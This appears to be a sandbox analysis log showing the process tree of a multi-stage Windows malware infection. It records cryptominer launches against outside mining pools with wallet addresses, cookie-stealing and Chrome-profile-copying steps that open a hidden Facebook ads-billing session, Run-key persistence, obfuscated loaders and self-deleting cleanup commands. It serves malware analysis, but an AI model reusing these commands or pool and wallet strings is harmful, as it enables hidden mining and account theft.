C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe" 2 3.1617987939.60708963c6c6520⤵
- Checks for any installed AV software in registry
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe"C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe" /8-2321⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe"C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe" /8-2322⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:8024
-
-
-
C:\Users\Admin\AppData\Local\Temp\p25yplus3vm\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\p25yplus3vm\Setup3310.exe" /Verysilent /subid=57721⤵PID:8980
-
C:\Users\Admin\AppData\Local\Temp\is-5A3IJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-5A3IJ.tmp\Setup3310.tmp" /SL5="$60352,138429,56832,C:\Users\Admin\AppData\Local\Temp\p25yplus3vm\Setup3310.exe" /Verysilent /subid=57722⤵PID:9400
-
C:\Users\Admin\AppData\Local\Temp\is-QBMO4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QBMO4.tmp\Setup.exe" /Verysilent23⤵PID:3748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xk2rdazcupr\eljstfm03u2.exe"C:\Users\Admin\AppData\Local\Temp\xk2rdazcupr\eljstfm03u2.exe" /ustwo INSTALL21⤵PID:6436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "eljstfm03u2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xk2rdazcupr\eljstfm03u2.exe" & exit22⤵PID:10544
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "eljstfm03u2.exe" /f23⤵
- Kills process with taskkill
PID:10688
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KBVI2ZD9PL\setups.exe"C:\Users\Admin\AppData\Local\Temp\KBVI2ZD9PL\setups.exe" ll18⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\is-M0SIO.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-M0SIO.tmp\setups.tmp" /SL5="$40B58,1873631,71168,C:\Users\Admin\AppData\Local\Temp\KBVI2ZD9PL\setups.exe" ll19⤵
- Checks computer location settings
PID:4740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Full Version.exe"17⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5440 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install18⤵
- Blocklisted process makes network request
PID:6752
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"17⤵
- Modifies data under HKEY_USERS
PID:1244 -
C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"18⤵
- Suspicious use of SetThreadContext
PID:5896 -
C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"19⤵
- Checks processor information in registry
PID:10072
-
-
-
C:\Users\Admin\AppData\Roaming\2DDB.tmp.exe"C:\Users\Admin\AppData\Roaming\2DDB.tmp.exe"18⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5864 -
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23758 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
PID:9028 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:9480
-
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w24915@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:6072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"18⤵PID:4772
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:4604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"17⤵
- Checks whether UAC is enabled
PID:4992
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"17⤵PID:8148
-
C:\ProgramData\2232435.exe"C:\ProgramData\2232435.exe"18⤵PID:8200
-
-
C:\ProgramData\4458909.exe"C:\ProgramData\4458909.exe"18⤵
- Suspicious behavior: SetClipboardViewer
PID:8516
-
-
C:\ProgramData\4586372.exe"C:\ProgramData\4586372.exe"18⤵PID:10852
-
-
C:\ProgramData\5685111.exe"C:\ProgramData\5685111.exe"18⤵PID:10080
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"17⤵PID:8824
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:4256
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:10144
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zj14kjvn.jtx\6762a766.exe & exit15⤵PID:8980
-
C:\Users\Admin\AppData\Local\Temp\zj14kjvn.jtx\6762a766.exeC:\Users\Admin\AppData\Local\Temp\zj14kjvn.jtx\6762a766.exe16⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe /8-2222 & exit15⤵PID:1856
-
C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exeC:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe /8-222216⤵PID:8704
-
C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe"C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe" /8-222217⤵PID:5404
-
-
-
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"11⤵
- Executes dropped EXE
PID:6692 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"12⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx12⤵PID:6384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:7124
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx14⤵PID:4356
-
-
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.comInfinita.exe.com x14⤵PID:3692
-
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.comC:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x15⤵
- Suspicious use of SetThreadContext
PID:6760 -
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exeC:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe16⤵
- System policy modification
PID:5656 -
C:\Users\Admin\Videos\xmrmin.exe"C:\Users\Admin\Videos\xmrmin.exe"17⤵
- Adds Run key to start application
PID:5612 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"18⤵PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"18⤵
- Adds Run key to start application
PID:4936 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"19⤵PID:6732
-
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"20⤵
- Adds Run key to start application
PID:416 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"21⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"22⤵
- Adds Run key to start application
PID:11048 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"23⤵PID:10708
-
-
-
-
-
-
-
-
C:\Users\Admin\Videos\ethminer.exe"C:\Users\Admin\Videos\ethminer.exe"17⤵
- Adds Run key to start application
PID:8088 -
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"18⤵PID:7656
-
-
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"18⤵PID:6264
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"19⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"20⤵
- Adds Run key to start application
PID:5852 -
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"21⤵PID:6940
-
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"22⤵
- Adds Run key to start application
PID:11180 -
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"23⤵PID:8624
-
-
-
-
-
-
-
-
C:\Users\Admin\Videos\111.exe"C:\Users\Admin\Videos\111.exe"17⤵
- Suspicious use of SetThreadContext
PID:5076 -
C:\Users\Admin\Videos\111.exe"C:\Users\Admin\Videos\111.exe"18⤵PID:9144
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"19⤵PID:8596
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"20⤵
- Modifies file permissions
PID:8628
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"20⤵
- Modifies file permissions
PID:8308
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"20⤵
- Modifies file permissions
PID:5272
-
-
-
-
-
C:\Users\Admin\Videos\Vickybuild.exe"C:\Users\Admin\Videos\Vickybuild.exe"17⤵PID:5740
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"18⤵PID:7712
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Scossa.vstm18⤵PID:7132
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe19⤵PID:7048
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^HKdDyBsKVRbIzDdBnSQuCmYpqTntMrWuEDHOlRJZUbTYFtiQycxTtRjoMuCjejYRUdtQWCdGpQkyFZEWMIZdIreMdnwtfbXHmwtgZdUDtNJhFiDMBFmxhHoQgsAbAjsLTDGDVfW$" Ambo.vstm20⤵PID:2420
-
-
C:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\Cio.exe.comCio.exe.com V20⤵PID:7652
-
C:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\Cio.exe.comC:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\Cio.exe.com V21⤵
- Suspicious use of SetThreadContext
PID:7940 -
C:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\RegAsm.exeC:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\RegAsm.exe22⤵PID:2172
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3020⤵
- Runs ping.exe
PID:5864
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5656 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"17⤵PID:1052
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 565618⤵
- Kills process with taskkill
PID:8068
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 318⤵PID:7052
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3014⤵
- Runs ping.exe
PID:5148
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\XOoRXgN90WGr.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\XOoRXgN90WGr.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6676 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4608
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe"C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe" /8-238⤵
- Executes dropped EXE
PID:5252 -
C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe"C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe" /8-239⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\1gmztt5tnve\qvquqcfcme2.exe"C:\Users\Admin\AppData\Local\Temp\1gmztt5tnve\qvquqcfcme2.exe"8⤵PID:5288
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1gmztt5tnve\qvquqcfcme2.exe"9⤵PID:5768
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhociknne2b\zjqs2pkwltw.exe"C:\Users\Admin\AppData\Local\Temp\jhociknne2b\zjqs2pkwltw.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5408 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jhociknne2b\zjqs2pkwltw.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jhociknne2b\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617727997 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6256
-
-
-
C:\Users\Admin\AppData\Local\Temp\tobfuwd1z1l\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\tobfuwd1z1l\setup_10.2_us3.exe" /silent8⤵
- Drops file in Program Files directory
PID:4408
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\V225T2ZIS8\setups.exe"C:\Users\Admin\AppData\Local\Temp\V225T2ZIS8\setups.exe" ll5⤵
- Executes dropped EXE
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\is-18NV8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-18NV8.tmp\setups.tmp" /SL5="$30294,1873631,71168,C:\Users\Admin\AppData\Local\Temp\V225T2ZIS8\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4788 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"5⤵PID:4668
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:4744 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4184
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
PID:2608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5976 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff909f96e00,0x7ff909f96e10,0x7ff909f96e206⤵PID:5988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2188 /prefetch:86⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1664 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:26⤵PID:496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2540 /prefetch:16⤵PID:5564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:16⤵PID:5360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵PID:5768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:16⤵PID:2172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:16⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:16⤵PID:6180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4244 /prefetch:86⤵PID:7236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:16⤵PID:6120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:16⤵PID:5176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:16⤵PID:7392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6048 /prefetch:86⤵PID:7852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:6236
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe" >> NUL5⤵PID:6868
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6956
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Checks computer location settings
PID:7444 -
C:\ProgramData\7340319.exe"C:\ProgramData\7340319.exe"5⤵PID:3952
-
-
C:\ProgramData\1072282.exe"C:\ProgramData\1072282.exe"5⤵
- Adds Run key to start application
PID:936 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:7592
-
-
-
C:\ProgramData\5241308.exe"C:\ProgramData\5241308.exe"5⤵
- Suspicious use of SetThreadContext
PID:5244 -
C:\ProgramData\5241308.exe"{path}"6⤵PID:4392
-
-
-
C:\ProgramData\415333.exe"C:\ProgramData\415333.exe"5⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7664
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:7036
-
-
-
-
-
